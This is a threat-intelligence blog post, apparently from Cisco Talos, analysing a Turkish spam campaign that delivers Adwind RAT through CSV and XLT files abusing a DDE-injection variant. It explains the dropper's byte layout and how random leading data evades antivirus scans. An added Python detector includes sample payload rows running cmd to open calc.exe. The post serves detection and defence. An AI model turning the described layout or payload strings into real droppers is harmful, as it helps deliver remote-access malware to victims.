Introduction

Cisco Talos, along with fellow cybersecurity firm ReversingLabs, recently discovered a new spam campaign that is spreading the Adwind 3.0 remote access tool (RAT), targeting the three major desktop operating systems (Linux, Windows and Mac OSX). This new campaign, first discovered by ReversingLabs on Sept. 10, appears to be a variant of the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel that has appeared in the wild in the past. This time, the variant is able to avoid detection by malware-blocking software. ReversingLabs has written their own blog on this issue here.
The majority of the targets in this campaign are in Turkey, according to data from the Cisco Umbrella cloud security platform. After our research, we have discovered important details about this attack, as well as the malicious, forged Microsoft Office documents that the attackers are using.
Spam campaign

Our Umbrella telemetry shows that this campaign started on Aug. 26, 2018, peaking on Aug. 28.
[Image: DNS query hits]

Umbrella also shows that 75 percent of the requests were made from Turkey. This is no surprise, considering the language in the spam emails is Turkish. Some of the targets were also located in Germany, which makes sense given that there is a significant Turkish community in Germany. In the particular example below, the attackers tempt the user with an email about the cost of footwear.
[Image: Sample of spam email]

In the screenshot above, we can see a CSV file is attached. We identified attachments with the .XLT extension, too — please see the "Microsoft Office Dropper" section for additional details.
Microsoft Office Dropper

We have seen at least two different droppers in this campaign. They use either the .csv or .xlt extension, both of which are opened by Microsoft Excel by default. Both versions were leveraging a new variant of the DDE code injection attack. Although this method is well-known, this variant is undetected at the time of this writing.
The dropper implementing this method will have the following internal format:
<random quantity of data><special byte><code to be executed><random quantity of data>
Here is a breakdown of what this format means:
<random quantity of data> — Random data in any quantity; the trailing block is optional. The bytes are not necessarily ASCII characters.
<special byte> — 0x0A (New Line) or 0x0D (Carriage Return). Excel interprets either of these bytes as a row separator, placing any data that follows in the first cell of the next row.
<code to be executed> — The executed command must start with "=", "+" or "-", or be included in a function (such as @SUM()). The command format is command|'argument'!cell. The cell does not need to be a valid one. For example:
The dropper file can have any of the extensions in the table below. Not all of the extensions will be opened by Microsoft Excel by default. However, for the non-default extensions, a script starting Excel with a file with one of these extensions as a parameter is still a viable attack scenario.
Formats like CSV don't have a predefined header, so the file can contain any kind of data at the beginning. Having random data there, as in the samples we found, may trick the antivirus into skipping the file scan. Other formats may be considered corrupted, as the file does not follow the expected structure.
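The layout above is what a file scanner has to cope with: a DDE cell can sit at the start of any row, behind an arbitrary non-ASCII prefix, and the row may be introduced by 0x0D alone. The following scanner is an added example written for this post (not Talos or ReversingLabs code); the regular expression and the two sample files are constructed here, and the calc.exe payload mirrors the example in the text.

```python
import re

# Excel treats both 0x0A and 0x0D as row separators (the <special byte> of the
# dropper layout). Python's re.M only knows "\n", so rows are split by hand.
ROW_SPLIT = re.compile(rb"[\r\n]")

# A DDE cell: optional whitespace, then =, +, - or @ (function form such as
# @SUM()), then command|'argument'!cell. The cell reference is not validated
# because, as the post notes, it does not need to be a valid one.
DDE_CELL = re.compile(rb"^\s*[=+\-@][^\r\n]*?\|'[^'\r\n]*'![^\r\n,]*")


def find_dde_cells(data: bytes) -> list[tuple[int, bytes]]:
    """Return (byte offset, matched cell) for each row that opens with a DDE command.

    Every row start is inspected regardless of what precedes it, so the random
    (possibly binary) prefix of the dropper format cannot hide the payload, and
    a header check such as "does this start like CSV/XLT?" is never relied on.
    """
    hits = []
    offset = 0
    for row in ROW_SPLIT.split(data):
        m = DDE_CELL.match(row)
        if m:
            hits.append((offset, m.group(0)))
        offset += len(row) + 1  # +1 for the separator byte consumed by split()
    return hits


def is_dde_dropper(data: bytes) -> bool:
    """True when at least one row carries a command|'argument'!cell payload."""
    return bool(find_dde_cells(data))


# Constructed samples (not taken from the campaign): a junk-prefixed dropper whose
# payload row is introduced by a lone 0x0D, a function-form variant, and a benign
# CSV whose first cells start with "=" and "-" but carry no DDE command.
DROPPER = (b"\xde\xad\xbe\xef\x00\x01 not,a,real,xlt,header\r"
           b"=cmd|'/c calc.exe'!A1\n"
           b"trailing,random,data\n")
FUNCTION_FORM = b"junk\r@SUM(1+1)*cmd|'/c calc.exe'!Z99\n"
BENIGN = b"name,amount\n=SUM(A1:A2),3\n-5,negative but harmless\n"

if __name__ == "__main__":
    for name, sample in (("DROPPER", DROPPER), ("FUNCTION_FORM", FUNCTION_FORM), ("BENIGN", BENIGN)):
        print(name, is_dde_dropper(sample), find_dde_cells(sample))
```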
Example of a dropper

Excel will display warnings to the user regarding the execution of code. Here is an example where the payload is executing "calc.exe":
[Image: Excel corruption warning upon execution]

As you can see, Excel detects that the opened file is not a real XLT document. It explains that the file is probably corrupted and asks the user if they are sure they want to open it.

[Image: Command execution warning]

The second warning notifies the user that the document will execute the application "CMD.exe".

[Image: Calc execution]

If the user accepts the three warnings, the system will open the calculator application.
In this campaign, the purpose of the injected code was to create and execute a VBScript with the following content:
The script uses bitsadmin, a tool provided by Microsoft to create download or upload jobs and monitor their progress, to get the final payload. This payload is a Java archive file.
Java Payload

The Java code is packed with the demo version of a commercial packer named "Allatori Obfuscator version 4.7."

[Image: Packer banner]

We identified the packed malware as Adwind RAT v3.0.

[Image: Adwind configuration]

It's a well-known multiplatform RAT with several possible configurations. The samples we tested were configured to achieve persistence on Windows, Linux and Mac OSX. Each platform has its own persistence name (see IOC section).
This RAT is used by several malicious groups. It gives its operators the ability to execute any kind of command on its victims, log keystrokes, take screenshots, take pictures or transfer files. In the past, it has been used to run cryptocurrency mining campaigns and in a separate attack that targeted the aviation industry.
Conclusion

The DDE variant used by the droppers in this campaign is a good example of how signature-based antivirus software can be tricked. It is also a warning sign regarding file extension-scanning configurations. This kind of injection has been known for years; however, this actor found a way to modify it in order to have an extremely low detection ratio. The malicious actor used a well-known multiplatform RAT with a wide range of capabilities — a "field proven" RAT that ensured it would work as designed and go undetected. Although both the generic method and the payload are known, this campaign shows how some variance in well-known artifacts can trick antivirus software. Their behavior, however, is clearly classical, which means that sandboxing- and behavior-based solutions aligned with intent-based networks should be able to detect and stop these threats without problems.
Coverage
Additional ways our customers can detect and block this threat are listed below.
Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.
Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.
Email Security can block malicious emails sent by threat actors as part of their campaign.
AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.
Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.
Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.